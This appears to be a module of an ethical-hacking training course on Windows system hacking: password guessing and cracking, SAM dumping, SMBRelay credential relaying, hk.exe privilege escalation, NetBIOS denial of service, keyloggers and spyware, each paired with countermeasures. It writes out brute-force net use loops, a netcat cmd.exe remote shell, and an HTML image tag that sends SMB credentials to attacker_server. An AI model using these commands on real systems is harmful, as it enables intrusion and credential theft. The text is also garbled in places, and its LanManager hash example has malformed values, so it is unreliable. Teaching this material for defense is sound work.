Module Objectives

In the preceding modules we have explored the reconnaissance phase, the scanning phase and the enumeration phase. We have noted the progressive intrusion that an attacker makes towards his target system(s). In this module we will explore the various means with which an attacker penetrates the system. Readers should bear in mind that this does not indicate a culmination of the attack. In the following modules we will be exploring certain means and methods of attack in greater detail.

On completion of this module, the reader will be familiar with:

• aspects of remote password guessing,

• role of eavesdropping,

• overview of denial of service (covered in detail in module 8),

• buffer overflows (covered in detail in module 20),

• implications of privilege escalation,

• various methods of password cracking,

• role of keystroke loggers,

• use of sniffers (covered in detail in module 7),

• deployment of remote control and backdoors (covered in detail in module 6),

• re direction of ports,

• methods used by attackers to cover their tracks on the target system and

• how they use the compromised system to hide sensitive information files.

Administrator Password Guessing

• Assuming that NetBIOS TCP139 port is open , the most effective method of breaking into NT/2000 is password guessing.

• Attempting to connect to an enumerated share (IPC$, or C$) and trying username/password.

• Default Admin$, C$, %Systemdrive% shares are good starting point.

We had discussed about reconnaissance phase where an attacker tries to gain as much information as possible about a target system. The more information an attacker has, the greater his chances of success in a password attack.

The starting point can be as simple as searching the company's web site for user names and system hardware. It can later expand to include social engineering and dumpster diving. There is a possibility that the attacker may get a password with these attacks, but more often, he is likely to get information about the company and employee names that will help in future password guessing.

Performing automated password guessing

• Performing automated password guessing is easy-simple loop using the NT/2000 shell for command based on the standard NET USE syntax.

  1. Create a simple username and password file.

  2. Pipe this file into FOR command

      C:\> FOR /F "token=1, 2*" %i in (credentials.txt) do net use \target\IPC$ %i /u: %j 

The simplest of these automation methods take advantage of the net command. This involves a simple loop using the NT/2000 shell for command. All the attacker has to do is to create a simple username and password file. He can then pipe this file into FOR command.

 C:\> FOR /F "token=1, 2*" %i in (credentials.txt) do net use \target\IPC$ %i /u: %j 

• A simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as LophtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is.

• The brute force method is the most inclusive - though slow. Usually, it tries every possible letter and number combination in its automated exploration.

• A hybrid approach is one which combines features of both the methods mentioned above. It usually starts with a dictionary and then tries combinations such as two words together or a word and numbers .

Tool: Legion

• Legion automates the password guessing in NetBIOS sessions. Legion will scan multiple Class C IP address ranges for Windows shares and also offers a manual dictionary attack tool.

Other software that bears functional similarity with Legion includes SMBscanner, Cerberus Information Security, NBTdump, Cain 2.0, GNIT NT Vulnerability Scanner, Share Finder and Cain & Abel. In UNIX, it has a variant in NFS exports and the Macintosh platform has Web sharing or AppleShare/IP as variant.

The protocol exploited is NetBIOS (Network Basic Input/Output System - is a program that allows applications on different computers to communicate within a local area network). NetBIOS is used in Ethernet, token ring, and Windows NT networks.

Legion polls wide range of IP addresses to check for availability of shared folders. The application broadcasts a NetBIOS request across the LAN to find all computers that have NetBIOS services. The application then searches each polled computer for available shares, and displays the results. Once these shares are known, there is little to do on the administrator's part to detect or deter brute force password guessing. The commercial version of Legion has an option to brute force crack any shares that were identified as shared, but password protected. The vulnerable system can have its drive mapped to the attacker's system and he can use this point of access for further nefarious activities such as installing Trojans, stealing information and even corrupting the system - thereby resulting in a denial of service. The most obvious countermeasure is to make sure that File and Print Sharing is disabled. If this is required, it must be password protected and allowed only to specific IP addresses because DNS names can be spoofed. The system must also restrict null sessions.

Hacking tool: NTInfoScan (now CIS)

• NTInfoScan is a security scanner for NT 4.0 is a vulnerability scanner that produces an HTML based report of security issues found on the target system and further information.

The above screenshot displays the depth of information the tool can deliver. Incidentally, the target system was running UNIX and CIS could pick out vulnerabilities and the nature of attack possible on the system.

Password guessing Countermeasures

• Block access to TCP and UDP ports 135 “139.

• Disable bindings to Wins client on any adapter.

• Use complex passwords

• Log failed logon attempts in Event viewer - Security log full event 529 or 539 - Logon/Logoff

However, the prime deterrent in choosing complex passwords is that they are often hard to remember. Users would not like to be locked out of their systems obviously. A best practice is to choose the first letter of every word in a phrase - such as 'Serena Williams holds four Grand Slam titles', resulting in a password 'SWhfGSt'. Windows can enforce choosing complex passwords. Users must be made to change their passwords at regular intervals or as often as they choose within an interval.

There are many log-analysis tools available that report network events, ranging from commercial products such as Event Reporter to free programs such as Backlog and NT Syslog. Moreover, log-parsing programs such as Logsurfer, Swatch, and several application-specific tools monitor system logs for attack signatures.

Monitoring Event Viewer Logs

• Logging is of no use if no one ever analyzes the logs

• VisualLast from www.foundstone.com formats the event logs visually

We have seen password countermeasures, now let us take a look at some of the tools. One such tool assisting network administrators is VisualLast from foundstone. VisualLast gives a network administrator insight into the event logs to assess the activity of their distributed network in a more accurate and efficient manner.

The program is visually intuitive and the software is multithreaded so that the interface remains responsive while scanning events. This does not lock out the user while waiting for long searches to complete. Scan settings can be saved to a file and dragged/dropped from explorer directly onto VisualLast to help automate the work.

In addition, multiple splitter bars may be used to arrange columns to personal taste. This greatly aids examining long lists. Detailed result findings can be printed in tabular form and CSV file support is also available so that the user can import his findings into Microsoft Excel for further analysis. Now any network administrator can quickly test for analysis or intrusion and save their work for documentation.

To add to its functionality, VisualLast can distinguish between local console logons and remote network logons and can even filter and display Microsoft Internet Information Server (IIS) logons .

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?

This is a serious threat to users ” such as remote users - who login to computers from remote sites. Therefore, the password security of a remote user is as good as the network he/she uses to access the remote computer.

Hacking Tool: LOphtcrack

• LC4 is a password auditing and recovery package distributed by @stake software. SMB packet capture listens to the local network segment and captures individual login sessions.

• With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days.

Moreover, it offered the possibility of deploying a 56-bit or 128-bit encryption to both LM and NTLM challenge/response pairs. These LMv2 and NTLMv2 encrypted pairs are quite strong and, although they can be captured from the network by LC4, they are essentially immune to either its dictionary or brute-force attacks. With the advent of Windows 2000/XP, Kerberos was introduced as the primary authentication method. Kerberos sends 56 or 128-bit encrypted session keys across the network, rather than the password hashes themselves . This is detailed more in module four. Here, no challenge/response pairs are sent across the network in W2k, so LC4's network SMB sniffer will capture nothing. However, in a heterogeneous network with NT and/or LM-based machines, the sniffer can capture traffic.

The above screenshot shows LC4's password audit wizard where one can specify the type of password cracking to be adopted and the audit methodology.

Hacking Tool: KerbCrack

• KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.

KerbCrack demonstrates the possibility of obtaining user passwords by simply listening to the initial Kerberos logon exchange. We had seen in our discussion on LC4 how Kerberos was introduced as a means to secure passwords. Let us explore how this can also be vulnerable to brute force attacks.

In general, encryption protocols such as Kerberos can be circumvented under the following four scenarios:

• The attacker is able to steal the encrypted key ” by any means possible.

• The attacker finds a flaw in the implementation of the protocol - attributable to the vendor.

• The attacker finds a flaw in the protocol itself ” which is highly unlikely .

• The attacker tries all possible keys in a brute-force approach. This is a possibility.

This is the approach that Arne Vidstrom's KerbCrack adopts towards extracting passwords by brute-force. The only consolation one can derive in the context of this attack is that it may take an infeasible long time to go through the entire key-space and try all possible combinations.

Privilege Escalation

• If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.

• This is called privilege escalation

The degree of the escalation depends on which privileges the attacker is authorized to hold and which privileges can be obtained in a successful attack. The best countermeasure is to ensure that users have least possible privileges ” or just enough privileges to use their system effectively. It is often the flaw in programming code that allows such escalation of privileges.

For instance the named pipes prediction flaw in Windows 2000 allows interactively logged on users to impersonate the SYSTEM account and execute arbitrary programs with those privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can anticipate the next Named Pipe and create the pipe before the SCM creates a pipe with the same name. When a new service is started, it connects to this malicious pipe. By instructing the SCM to start an arbitrary service that runs as a highly privilege, (such as Clip Book which runs as SYSTEM) the SCM connects the service to the malicious pipe. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrator's group . The attacker can conclude his privilege escalation by logging out and then logging in.

Tool: GetAdmin

• GetAdmin.exe is a small program that adds a user to the local administrators group.

• It uses low-level NT kernel routine to set a globalflag allowing access to any running process.

• You need to logon to the server console to execute the program.

• The GetAdmin.exe is run from the command line or from a browser.

• This only works with Nt 4.0 Service pack 3.

Similarly, if Getadmin.exe is run by a user who is already a member of the administrators local group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. Getadmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read only. Therefore the only way to use GetAdmin to modify a domain account database is to log on a primary domain controller and run the utility locally on the PDC.

Tool: hk.exe

The hk.exe utility exposes a Local Procedure Call flaw in NT.

• A non-admin user can be escalated to administrators group using hk.exe

   C:\>net localgroup administrators peter /add Access Denied ------------------------------------------------ c:\>hk net localgroup administrators peter /add lsass pid & tid are: 47 -48 NtImpersonateClientOfPort succeeded 

 nc -1-p 23 nc -d -e cmd.exe 192.168.xx.xx 23 (Done on the active netcat running on the webserver) hk2 nc -d -e cmd.exe 192.168.xx.xx 23 lsass pid & tid are: 50 - 53 

The NtImpersonateClientOfPort succeeds because of the nature by which port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients . Instead, it uses the original handle it got from the NtCreatePort call.

The kernel identifies the client by using the pid, tid, and mid from the message. Though a patch has been issued by Microsoft for NT and a new API NtSecureConnectPort on W2K allows a client to verify that the port's server is running with a particular SID, this tool is still seen in the wild.

Manual Password Cracking Algorithm

• Find a valid user

• Create a list of possible passwords

• Rank the passwords from high probability to low

• Key in each password

• If the system allows you in - Success

• Else try till success

A text file is created to serve as a dictionary from which the main FOR loop will draw usernames and passwords as it iterates through each line:

 [file: credentials.txt] administrator "" administrator password administrator administrator [Etc.] 

From a directory that can access the text file the following command is typed:

 c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^ More? do net use \victim.com\IPC$ %j /u:victim.com\%i^ More? 2 >> nul^ More? && echo %time% %date% >> outfile.txt^ More? && echo \victim.com acct: %i pass: %j >> outfile.txt c:\>type outfile.txt 

Automatic Password Cracking Algorithm

• Find a valid user

• Find encryption algorithm used

• Obtain encrypted passwords

• Create list of possible passwords

• Encrypt each word

• See if there is a match for each user ID

• Repeat steps 1 through 6

At its simplest form, automation involves finding a valid user, the particular encryption algorithm being used, obtaining encrypted passwords, creating a list of all possible passwords, encrypting each word and checking for a match for each user ID known. This process is repeated till the desired results are obtained or all options are exhausted.

Password Types

• Passwords that contain only letters.

• Passwords that contain only numbers.

• Passwords that contain only special characters.

• Passwords that contain letters and numbers.

• Passwords that contain only letters and special characters.

• Passwords that contain only special characters and numbers.

• Passwords that contain letters, special characters and numbers.

• Passwords that contain only letters: As rightly inferred, these contain just alphabets and are the easiest to crack. Example: "secret"

• Passwords that contain only numbers: These passwords consist purely of numerals. Example: "12354"

• Passwords that contain only special characters: These passwords consist of only special characters. They are easy to crack in accordance with their decreasing length. Example: "*%$%@"

• Passwords that contain letters and numbers: These passwords were the first step towards secure passwords. They are relatively harder to crack than passwords with just letters or numerals. Examples: "a3rf5"

• Passwords that contain only letters and special characters and passwords that contain only special characters and numbers are quite similar to the preceding one. Examples: "df%g$i", "39*&4"

• Passwords that contain letters, special characters and numbers are considered to be the most secure as the combination can be difficult to crack. Given an appropriate length, they can be considered to be safe and if encrypted well, safe on the network as well. Example: "a#d5y8%"

Types of Password Attacks

• Dictionary attack

• Brute force attack

• Hybrid attack

• Social engineering

• Shoulder surfing

• Dumpster diving

A dictionary password cracker involves taking a list of words, and encrypting them one at a time to see if on encryption, they match the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password. Sometimes these dictionary crackers can maneuver each word in the wordlist by using suitable filters. These rules/filters allow attackers to explore possible alphanumeric words such as "gr8" for "great" and other variations to derive the most from the word list. Alternatively the attacker can choose to pre-treat the wordlist. A good example of a wordlist manipulation tool that allows all kinds of ways to filter, expand, and alter wordlists is Therion's password utility for DOS.

A brute force cracker simply tries all possible passwords until it gets the password. From a cracker's perspective, this is a lengthy process. However, given enough time and CPU power the password eventually gets cracked. Most modern brute force crackers allow a number of options to be specified, such as maximum password length or characters to brute force with.

Cracking NT/2000 passwords

• SAM file in Windows NT/2000 contains the usernames and encrypted passwords. The SAM file is located at %systemroot%\system32\config directory

• The file is locked when the OS is running.

  • Booting to an alternate OS

    • NTFSDOS (www.sysInternals.com) will mount any NTFS partition as a logical drive.

  • Backup SAM from the Repair directory

    • Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._sam

  • Extract the hashes from the SAM

    • Use LOphtcrack to hash the passwords.

This file is usually locked when the system is in use. However, once the system is not used by any system components , it is world readable by default. Attackers are particularly vigilant to detect any possible SAM.SAV files which could be readable, as these can be used for obtaining password info .

Not all is lost if the system is in use and the SAM file is locked. If a system administrator has casually forgotten to rename the administrator account or change the initial password, the attacker might be in luck because during the installation of NT/2000 a copy of the password database is put in \\WINNT\REPAIR.

What happens if the system administrator has updated their repair disk? The attacker can then look for a copy of the repair disks and extract the password database from the SAM._ file in the ERD directory. He can then use a couple of different utilities for dumping the password hashes out, like pwdump or even run Lophtcrack (which has pwdump code built in) to extract the passwords. SAMDUMP.EXE can be used to extract the user information out of it.

Redirecting SMB Logon to the Attacker

• Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.

• Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.

• When the hyperlink is clicked, the user unwittingly sends his credentials over the network.

The SMB model defines two levels of security: Primarily protection is applied at the share level on a server. Each share can have a password, and a client only needs that password to access all files under that share. This was the first security model that SMB had. The second security level is at the user level. Protection is applied to individual files in each share and is based on user access rights. Every client desiring to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.

However, switched networks require a different attack methodology. Here, the attacker will attempt to redirect the SMB logon to obtain the authentication credentials. To do this, a user must be tricked into connecting to an SMB server of the attacker's choice. This may be achieved by sending an email to the victim with an embedded hyperlink to a fraudulent SMB server. The victim unwittingly sends his SMB credentials over the network if he chooses to follow the hyperlink. Windows automatically tries to log in as the current user if no other authentication information is explicitly supplied.

As an example, the following code submitted in the email and embedded in html brackets will show nothing in the email but, when the null gif is loaded by the victim's Internet Explorer, the victim will automatically initiate an SMB session with attacker_server.

img src=file://attacker_server/null.gif height=1 width=1. SMBCapture will be listening on the attacker_server or its local segment and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.

Hacking Tool: SMB Relay

• SMBRelay is essentially a SMB server that can capture usernames and password hashes from incoming SMB traffic.

• It can also perform man-in-the-middle (MITM) attacks.

• You must disable NetBIOS over TCP/IP and block ports 139 and 445.

• Start the SMBRelay server and listen for SMB packets:

   c:\>smbrelay /e c:\>smbrelay /IL 2 /IR 2 

• An attacker can access the client machine by simply connecting to it via relay address using: c: \> net use * \\<capture _ip>\c$

Once the attacker has used SMBRelay to connect and authenticate, SMBRelay with disconnect from the target client and binds a new IP address to port 139. This IP address is the relay address. This relay address can be connected to using the 'net use' command and then be used by all networking components available to the Windows machine. The windows box is now ready to relays all SMB traffic, with the exclusion of negotiation and authentication traffic.

The attacker can disconnect from and reconnect to the new IP address as long as the target host stays connected. As SMBRelay is multi-threaded and capable of handling multiple connections simultaneously , it will create new IP addresses sequentially, removing them when the target host disconnects. This ensures that the same IP address is not allowed to connect twice, unless a successful connection to that target was achieved and disconnected. SMBRelay collects the NTLM password hashes transmitted and writes them to hashes.txt in a format usable by Lophtcrack so the passwords can be cracked later.

The usage is smbrelay [options]

Options:

• /D num - Set debug level, current valid levels: 0 (none), 1, 2 Defaults to 0.

• /E - Enumerates interfaces and their indexes.

• /F[-] - Fake server only, capture password hashes and do not relay Use - to disable acting as a fake server if relay fails.

• /IL num - Set the interface index to use when adding local IP addresses.

• /IR num - Set the interface index to use when adding relay IP addresses Defaults to 1.

• /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC Defaults to primary host IP.

• /R[-] IP - Set the starting relay IP address to use. Use [-] to not add each relay IP address to the NIC Defaults to 192.1.1.1 first.

• /S name - Set the source machine name.

The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter so that traffic will always flow through TCP port 139. The servers can then capture both LM and NTLM passwords, and write them to its working directory as hashes.txt which can be later imported into LOphtCrack. Furthermore, the attacker's system now can access the client machine by simply connecting to it via the relay address: c: \>net use * \\192.x.x.x\c$

On the client side (W2K), "net use" command will fail to turn up any sessions as the program throws a system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name, CDC4EVER, which SMBRelay sets by default unless changed using the "/S name " parameter.

While capturing SMB authentication using a fraudulent server with SMBRelay might look easy, there are several pre-requisites for the attack to be successful. These will be discussed later in the module.

SMBRelay man-in-the-middle Scenario

• The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, an d a target server address of 192.168.234.34 with /T.

  c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34

• When a victim client connects to the fraudulent server thinking it is talking to the target, MITM server intercepts the call, hashe s the password and passes the connection to the target server.

SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.

Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R and a target server address of 192.168.200.168 with the /T switch:

c:\>smbrelay /IL /IR 2 192.168.200.252 /T 192.168.200.168

A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.

SMBRelay attempts to disable SMB signing and may be able to circumvent some of these settings. A significant aspect of MITM attack is the absence of any obvious log entry to indicate that a MITM attack is in progress. This leaves Kerberos as the only real defense against MITM.

SMBRelay Weakness & Countermeasures

• The problem is to convince a victim's client to authenticate to the MITM server

• You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.

• Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server Countermeasures

• Configure Windows 2000 to use SMB signing.

• Client and server communication will cause it to cryptographically sign each block of SMB communications.

• These settings are found under Security Policies /Security Options

Moreover, administrative access is required for adding and removing IP addresses which SMBRelay does in its normal mode of its operation. Therefore, privilege escalation would be required in most cases unless there is no proper allocation of privileges.

SMBRelay targets and runs best on Windows NT and 2000 machines. Connections from 9x and ME boxes will have unpredictable results. Moreover, it relies on the attacker's ability to convince the user to authenticate himself to the MITM server. Ways to overcome these weaknesses include sending a malicious email ” as discussed earlier (using an image to send the server's hyperlink and embedding it using HTML).

Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can be easily spoofed to reroute traffic originating from the system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.

Hacking Tool: SMB Grind

SMBGrind increases the speed of LOphtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

We had discussed the password cracker LOphtCrack earlier in the module. Cracking the captured challenge/response hashes from a network capture takes a bit longer for one password than its counterpart gotten from a registry dump. One of the limitations faced by these crackers is the unique challenge question answered by each client separately.

Once LOphtCrack parses the sniffed hash list for a matching hash for a particular account, it will inadvertently cover other existing accounts as well, that can be matched to other password hashes. This is because in a network capture, each hash is encrypted with a unique challenge so that the work done cracking one password cannot be used again to crack another. This means that the time to completion scales linearly as more password hashes are added to the crack.

One way of increasing the speed of LOphtCrack sessions on sniffer dumps is to remove duplication and provide a facility to target specific users without having to edit the dump files manually. Therefore password cracking becomes a time-consuming laborious process unless it is targeted towards particular passwords.

If an attacker can force a NetBIOS connection from its target it can retrieve the user authentication information of the currently logged in user. On its part SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking. The challenge is eight bytes of randomly generated data which the client encrypts using the password as an encryption key. If this can be obtained, the session can be hijacked as well. But this is not always easy.

Hacking Tool: SMBDie

SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB request.

An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system, and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of "Max Param Count" and "Max Data Count" values are equal to zero, then the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released then the heap will be in an inconsistent state and will cause a blue screen of death. The attacker can use both a user account and anonymous access to accomplish this.

Windows 2000 Servers and Workstations are not vulnerable as long as the "Additional restrictions for anonymous connections" option in their local security settings is set to "No access without explicit anonymous permissions". Windows XP workstations are susceptible to the SMBDie exploit.

Any machine on the network including systems that are connected via VPN can launch this attack. All that an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks. By blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the LAN man server service can be stopped which prevents the attack, but again may not be suitable on a file and print sharing server.

Hacking Tool: NBTDeputy

• NBTDeputy register a NetBIOS computer name on the networkand is ready to respond to NetBT name-query requests .

• NBT deputy helps to resolve IP address from NetBIOS computer name. It's similar to Proxy ARP.

• This tool works well with SMBRelay.

• For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is 192.168.1.10 and NBT Deputy is also ran and 192.168.1.10 is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places"

For example, SMBRelay might be running on a computer as SERVER1 with an IP address of 192.168.10.1 NBTdeputy will register this and specify the IP address of SERVER1. When logon users access "My Network Places", SMBRelay may connect to any XP or .NET Server. When "My Network Places" is clicked by the logon-user, Windows XP tries to acquire the shared resources list of all computers on the LAN. The user's local log-on password is used when the password for the shared resource has not been preserved at that instance of access.

In a hybrid local area network where any pre W2K machine exists, Windows XP will automatically transmit the local log-on password to the NT4.0 machine using LM authentication. Even if the registry setting for NoLMHash has been set to one, Windows XP automatically transmits the local log-on password to the NT4.0 machine using LM authentication when "My Network Places" is clicked. It should be noted that Windows XP doesn't use LM authentication when there are only Windows 2000 and XP machines on the LAN even if "LMCompatibilityLevel" is 0. In order to protect the LM hash, Windows XP has a registry value named No LMHash, located under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. If NoLMHash is set as '1' and the user changes password, the true LM hash will not be generated.

There are certain pre-requisites for NBTdeputy to be effective. NetBIOS over TCP/IP must be disabled as NBTdeputy uses port 137 and 138. The user must specify a unique computer name on the LAN because NBTdeputy does not check for existing computer names. The user must also specify an existing Workgroup on LAN as NBTdeputy does not become the Master Browser. NBTdeputy must exist on the same LAN as the targeted XP and .Net Server machines.

NetBIOS DoS Attack

• Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict so that the system will no longer will be able to use it.

• This will block the client from participating in the NetBIOS network.

• Tool: nbname

  • NBName can disable entire LANs and prevent machines from rejoining them.

  • Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.

Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.

Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.

The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.

The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.

Using /FINDALL /CONFLICT /DENY * will disable entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network infected by the tool will think that their names already are being used.

Hacking Tool: John the Ripper

• It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free

• The resulting passwords are case insensitive and may not represent the real mixed-case password.

John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Out of the box, John supports (and auto detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish -based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used - such as bitslice DES - require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).

However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is a small hindrance to a determined patient attacker.

What is LanManager Hash?

Example: Lets say your password is: '123456qwerty'

• When this password is encrypted with LM algorithm, it is first converted to all uppercase: '123456QWERTY'

• The password is padded with null (blank) characters to make it 14 character length: '123456QWERTY_'

• Before encrypting this password, 14 character string is split into half: '123456Q and WERTY_'

• Each string is individually encrypted and the results concatenated .

• '123456Q' = 6BF11E04AFAB197F

  'WERTY_' = F1E9FFDCC75575B15

• The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

All Windows clients including Windows 2000, Windows Server 2003, and Windows XP are configured by default to send LM and NTLM authentication responses, except Win9x clients, which only send LM. The default setting on servers allows all clients to authenticate with servers and use their resources. However, this default setting allows for LM responses (the weakest form of authentication response) to be sent over the network. This makes it attractive to attackers who can sniff the traffic and crack passwords with relatively less effort.

Microsoft Windows NT stores two types of passwords: A LAN Manager (LM) password and a Windows NT password. We have seen in our discussion in module four how the domain controller gives out an eight byte challenge and the twenty four byte challenge response the client (server or workstation) replies with. These hashes are transmitted without encryption over the network. If the domain controller authenticates the challenge response, it replies with an NT session key and a LAN Manager (LM) session key. These session keys are encrypted between the client and the Domain Controller.

Let us now take a look at the LAN Manager hash. LAN Manager uses a fourteen byte password. If the password is less than fourteen bytes, it is concatenated with zeros. After conversion into upper case, it is split into seven byte halves . From each seven byte half an eight byte odd parity DES key is constructed . Each eight byte DES key is encrypted with a "magic number". The results of the magic number encryption are concatenated into a sixteen byte one way hash value. This value is the LAN Manager one-way hash of the password.

Password Cracking Countermeasures

• Enforce 7 “12 character alpha-numeric passwords.

• Set the password change policy to 30 days.

• Physically isolate and protect the server.

• Use SYSKEY utility to store hashes on disk.

• Monitor the server logs for brute force attacks on user accounts.

Password cracking is a term used to describe the penetration of a network, system, or resource with or without the use of tools to unlock a resource that has been secured with a password.

Adopt the practice of isolating the server for more security. Preferably no applications should be running on the authentication server so that vulnerabilities if any are not exploited. SYSKEY can be used to store hashes on the system. Passwords in the SAM database are stored in hashed form to prevent a user who gains access to the database from reading the passwords.

However, offline password attacks are still possible if an attacker obtains a copy of the database and is willing to devote the time needed to perform an exhaustive search of all possible passwords. The Syskey tool is designed to prevent such attacks by strongly encrypting the SAM database using 128-bit cryptography. The SYSKEY command is used to select the System Key option and generate the initial key value. The key value may be either a machine generated key or a password derived key. The SYSKEY command first displays a dialog showing whether strong encryption is enabled or disabled. After the strong encryption capability is enabled, it cannot be disabled.

It always pays to be alert for intrusion or suspicious activity that can help detect password cracking activity. Logs should be carefully monitored for tell-tale signs and adequate defensive measures taken.

Keystroke Loggers

• If all other attempts to sniff out domain privileges fail, then keystroke logger is the solution.

• Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

• There are two types of keystroke loggers:

  1. Software based and

  2. Hardware based.

Keystroke loggers come in both hardware and software forms and are used to capture and compile a record of everything typed using the keyboard and making it available to another person / agency probing the user. This may be conveyed over e-mail or a Web site or even saved on the same system as a hidden file.

Generic keystroke loggers record the application name, time and date the application was opened, and the keystrokes associated with that application. The appeal keystroke loggers have is the ability to capture information before it can be encrypted for transmission over the network. This gives the person probing access to pass phrases and other well-hidden information. Keystroke loggers can be broadly classified as hardware keystroke loggers and software keystroke loggers.

Hardware keystroke loggers are hardware devices that attach physically to the keyboard and records data. These devices generally look like a standard keyboard adapter, so that they remain camouflaged unless specifically looked for. In order to retrieve data from a hardware logger, the person who is doing the probing must regain physical access to that piece of equipment. Hardware loggers work by storing information in the actual device, and generally do not have the ability to broadcast or send such information out over a network. One primary advantage hardware keystroke loggers carry is that they will not be discovered by any of the anti-spyware, anti-virus or desktop security programs.

Software keystroke loggers are more widely used as they can be installed remotely via the network, as part of virus / Trojan software etc. Physical access is not required on part of the person probing to obtain keystroke data (as data is emailed out from the machine periodically). Software loggers often have the ability to obtain much more data as well, as they are not limited by physical memory allocations in the same way as hardware keystroke loggers are. Magic Lantern - developed as part of the FBI's Carnivore project - is a Trojan/key-logger specifically aimed at gathering encryption key information for transmission back to the FBI.

Spy ware: Spector (www.spector.com)

• Spector is a spy ware and it will record everything anyone does on the internet.

• Spector automatically takes hundreds of snapshots every hour , very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

• Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer's hard drive.

Spector Pro acts as an activity monitor by also taking snapshots of the screen at regular, preset intervals. The stealth installation leaves no icons, no installation file, and no notice when the software loads on computer bootup . The attacker can access the software with a hot-key combination that can be customized, and password protected.

